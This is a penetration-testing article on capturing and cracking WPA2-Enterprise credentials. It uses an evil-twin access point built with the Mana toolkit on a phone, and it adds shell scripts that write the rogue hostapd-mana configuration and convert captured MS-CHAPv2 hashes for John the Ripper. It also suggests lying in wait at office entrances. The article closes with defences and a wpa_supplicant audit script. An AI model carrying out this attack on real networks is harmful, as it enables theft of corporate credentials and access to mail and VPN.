How corporate Wi-Fi gets hacked: new possibilities
There are plenty of articles on the Internet about hacking Wi-Fi, but most of them deal with WEP or WPA/WPA2-Personal, where the attacker has to capture the handshake between the client and the access point. Many corporate networks instead use WPA2-Enterprise with username and password authentication, because it is the cheapest option to deploy. In this mode the authentication itself is handled by a RADIUS server.
The client OS builds a TLS-protected tunnel to the RADIUS server (the access point only relays the EAP frames and never sees the credentials), and inside that tunnel the user is authenticated mostly with the MS-CHAPv2 protocol (PEAP-MSCHAPv2).
To pentest such a network we can stand up a fake access point with our own RADIUS server and collect what MS-CHAPv2 sends: the login, the challenge and the response. That is enough for offline password brute force, because the response is computed only from the user's password hash and the challenge.
We need Kali Linux and a Wi-Fi adapter that supports access point mode. Check it with the iw list command; in the "valid interface combinations" section we are looking for a line like this one:
* #{ AP, mesh point } <= 8,
A year ago, faking such an access point so that it collected credentials took a lot of manual work: specific versions of hostapd and FreeRADIUS had to be patched, built and carefully configured. In August 2014 the Mana toolkit (by SensePost) appeared, automating many attack vectors against wireless clients.
A laptop is not always convenient, so we will use something more compact: a phone. An alternative is a Raspberry Pi with FruityWifi. The WiFi Pineapple, unfortunately, does not support Mana.
We launch Kali, connect the Wi-Fi card through a USB OTG cable and start the NetHunter application.
The first step is to find the interface name of the connected Wi-Fi card. Select Kali Launcher from the menu and run Wifite, which lists the wireless interfaces; in our case it is wlan1. Then select MANA Evil Access Point from the menu and configure the access point:
- the interface found in the previous step (interface),
- the SSID of the network being attacked (ssid), so that clients with a saved profile for it connect on their own,
- 802.1X authentication (ieee8021x = 1),
- the WPA mode (wpa): 0 = open, no WPA/WPA2; 1 = WPA; 2 = IEEE 802.11i/RSN (WPA2); 3 = both WPA and WPA2; match what the target network uses,
- the list of accepted key management algorithms (wpa_key_mgmt = WPA-EAP),
- the set of accepted pairwise ciphers (wpa_pairwise), again matching the target network,
Disable Karma (enable_karma = 0), since we are impersonating one specific network rather than answering every probe request nearby, and set the file to which captured logins and hashes are written (ennode). Mana ships with five launch scripts that start, besides the access point, extra tools for MITM attacks. We need mana-noupstream-eap, the one intended for networks with 802.1X authentication. By default the script tries to crack the captured hash, lets the client connect and then runs a MITM attack. Cracking hashes on a phone is a bad idea, so we comment out the unnecessary lines, add a command that writes the captured data to a file on a USB flash drive, and start Mana.
As soon as a Wi-Fi client that has the target network saved comes within range of our access point, it will try to authenticate to it. A good place to lie in wait is the entrance to the office or business centre at the beginning or end of the working day, when potential victims pass through reception.
We stop Mana and look at what we have caught. The captured data has the format:
Protocol | Login | Challenge | Response
Now the hashes can be cracked in a calm setting on a normal computer. Two tools will do:
- asleap (used in the original script),
- John the Ripper (the captured lines need a small conversion into its netntlm format, login:$NETNTLM$challenge$response):
# strip the colons from the hex fields, then turn "Protocol|Login|Challenge|Response" into "Login:$NETNTLM$Challenge$Response"
# (assumes no blanks around the | separators; the protocol field is dropped)
sed 's/://g' HASHES.txt | sed 's/\([^|]*\)|\([^|]*\)|\([^|]*\)|\([^|]*\)/\2:$NETNTLM$\3$\4/' > john-HASHES.txt
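The access point settings listed above and the hash conversion, as an added example that is not from the article or from the Mana toolkit: a POSIX shell script that writes the hostapd-mana configuration and converts a captured Protocol | Login | Challenge | Response file into John the Ripper's netntlm format, trimming blanks and dropping lines whose challenge or response has the wrong length. The interface name, SSID, file paths and the sample capture lines are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the article and not part of the Mana toolkit).
# write_mana_conf builds the hostapd-mana configuration with the settings the
# article lists; to_netntlm converts a captured
# "Protocol | Login | Challenge | Response" file into john's netntlm format.
# Interface, SSID, file paths and the sample capture are assumptions.

# $1 = config path, $2 = wireless interface, $3 = SSID of the target network.
# Key names are hostapd's; enable_karma and ennode are the Mana options the
# article names (later hostapd-mana releases renamed them, check your version).
# wpa=2 / CCMP assumes the target runs WPA2-CCMP; mirror whatever it really uses.
write_mana_conf() {
    cat > "$1" <<EOF
interface=$2
driver=nl80211
hw_mode=g
channel=6
ssid=$3
ieee8021x=1
eap_server=1
eap_user_file=/etc/mana-toolkit/hostapd.eap_user
ca_cert=/etc/mana-toolkit/certs/ca.pem
server_cert=/etc/mana-toolkit/certs/server.pem
private_key=/etc/mana-toolkit/certs/server.key
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
enable_karma=0
ennode=/mnt/usb/hostapd.credout
EOF
}

# Reads capture lines on stdin, writes "Login:$NETNTLM$Challenge$Response" on
# stdout, one per unique credential. Colons and surrounding blanks are removed
# from the hex fields. A line is dropped unless the challenge is 8 bytes
# (16 hex chars) and the response 24 bytes (48 hex chars), which is what the
# netntlm format expects; anything else would only fail inside john later.
to_netntlm() {
    awk -F'|' '
        NF == 4 {
            for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i)
            gsub(/:/, "", $3); gsub(/:/, "", $4)
            if (length($3) != 16 || $3 !~ /^[0-9A-Fa-f]+$/) next
            if (length($4) != 48 || $4 !~ /^[0-9A-Fa-f]+$/) next
            print $2 ":$NETNTLM$" $3 "$" $4
        }' | sort -u
}

# Constructed sample capture in the layout the article describes; the hex is
# made up, so it cracks to nothing. Line 2 is truncated and must be dropped,
# line 3 repeats line 1 and must be collapsed into one entry.
sample_capture() {
    printf '%s\n' \
      'MSCHAPv2 | CORP\jsmith | 3a:1f:9c:00:5e:7b:d2:41 | 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:01:23:45:67:89:ab:cd:ef' \
      'MSCHAPv2 | CORP\jsmith | 3a:1f:9c:00 | 00:11:22:33' \
      'MSCHAPv2 | CORP\jsmith | 3a:1f:9c:00:5e:7b:d2:41 | 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:01:23:45:67:89:ab:cd:ef'
}

# Typical use once the capture has been copied off the phone's USB stick:
#   write_mana_conf /etc/mana-toolkit/hostapd-mana-eap.conf wlan1 CorpWiFi
#   to_netntlm < /mnt/usb/hostapd.credout > john-HASHES.txt
#   john --format=netntlm --wordlist=/usr/share/wordlists/rockyou.txt john-HASHES.txt
```

The length check matters in practice: the Challenge field must be the 8-byte MS-CHAPv2 challenge hash (the value asleap's -C option also takes), not the 16-byte authenticator or peer challenge, or john will silently skip the line.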
The recovered accounts can be used to get further into the corporate network over Wi-Fi or VPN, and to read corporate mail, since the same domain credentials usually work for all of them.
It turned out that user hashes cannot always be intercepted. Desktop OSes (Windows, macOS, Linux) and iOS protect their users best: on the first connection the OS asks whether to trust the certificate presented by the RADIUS server of this Wi-Fi network. When the legitimate access point is replaced by ours, the OS asks again about the new certificate presented by the rogue RADIUS server, even if that certificate was issued by a trusted public certification authority (Thawte, VeriSign). The protection still depends on the user answering no; a pre-provisioned profile that pins the CA and the expected server name removes that decision from the user entirely.
Android devices (as of this writing) do not validate the certificate by default, but the Wi-Fi profile allows a root (CA) certificate to be specified for this network, after which the rogue server is rejected.
Windows Phone devices validate the certificate by default. The server certificate validation options are:
- none;
- always ask;
- certification authority (pin a specific CA).
Summing up, Positive Technologies experts recommend the following security measures:
- users: check the certificate when connecting, not only to online banking but also to corporate Wi-Fi, and treat a new certificate prompt on a network you have used for months as a warning rather than a nuisance;
- Android users: install the root certificate used on the corporate network and select it in the Wi-Fi profile, otherwise the phone will accept any RADIUS server;
- administrators: move to certificate-based authentication (EAP-TLS), or at least push a client profile that pins the RADIUS server's CA and name; otherwise do not be surprised when people with a phone and an antenna periodically show up outside the office entrance.
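The recommendations above as a client-side configuration. This is an added example and not from the article: a wpa_supplicant.conf fragment (wpa_supplicant is the supplicant used on Linux desktops and inside Android) showing the weak 802.1X profile next to the hardened one, plus a small audit that flags profiles which would accept a rogue RADIUS server. The SSIDs, credentials, CA path and RADIUS host name are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the article). sample_supplicant_conf is a constructed
# wpa_supplicant.conf with one weak and one hardened WPA2-Enterprise profile;
# audit_eap_profiles reads such a config and reports profiles that would build
# the TLS tunnel to any RADIUS server. SSIDs, credentials, CA path and RADIUS
# host name are assumptions.

sample_supplicant_conf() {
    cat <<'EOF'
# Weak: no ca_cert, so the TLS tunnel is built to whichever RADIUS server
# answers, and MS-CHAPv2 then hands it the login, challenge and response.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
# Hardened: the corporate root CA is pinned and the server certificate's name
# must end in the RADIUS host's domain, so a rogue server fails the TLS
# handshake and MS-CHAPv2 never runs. Pinning a public CA without the name
# check would still let an attacker's certificate from that CA through.
network={
    ssid="CorpWiFi-Secure"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-root-ca.pem"
    domain_suffix_match="radius.corp.example"
}
EOF
}

# Reads a wpa_supplicant.conf on stdin and prints, for every WPA-EAP network,
# "<ssid> ok" or "<ssid> WEAK (<missing settings>)". Exits 1 if any is weak.
audit_eap_profiles() {
    awk '
        /^[ \t]*network[ \t]*=[ \t]*[{]/ { inblk = 1; ssid = ""; eap = 0; ca = 0; dom = 0; next }
        inblk && /^[ \t]*[}]/ {
            if (eap) {
                m = ""
                if (!ca)  m = m "ca_cert "
                if (!dom) m = m "domain_suffix_match "
                sub(/ $/, "", m)
                if (m == "") print ssid " ok"
                else { print ssid " WEAK (" m ")"; weak = 1 }
            }
            inblk = 0; next
        }
        inblk && /^[ \t]*ssid[ \t]*=/ { sub(/^[^=]*=[ \t]*/, ""); gsub(/"/, ""); ssid = $0 }
        inblk && /^[ \t]*key_mgmt[ \t]*=.*WPA-EAP/ { eap = 1 }
        inblk && /^[ \t]*ca_cert[ \t]*=/ { ca = 1 }
        inblk && /^[ \t]*domain_suffix_match[ \t]*=/ { dom = 1 }
        END { exit (weak ? 1 : 0) }'
}

# Typical use on a real machine:
#   audit_eap_profiles < /etc/wpa_supplicant/wpa_supplicant.conf
```

On Android the same two settings appear in the Wi-Fi profile as the CA certificate and the domain fields; a profile with the CA left at "Do not validate" is the weak case above.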
Posted by Dmitry Trifonov, Positive Technologies Research Center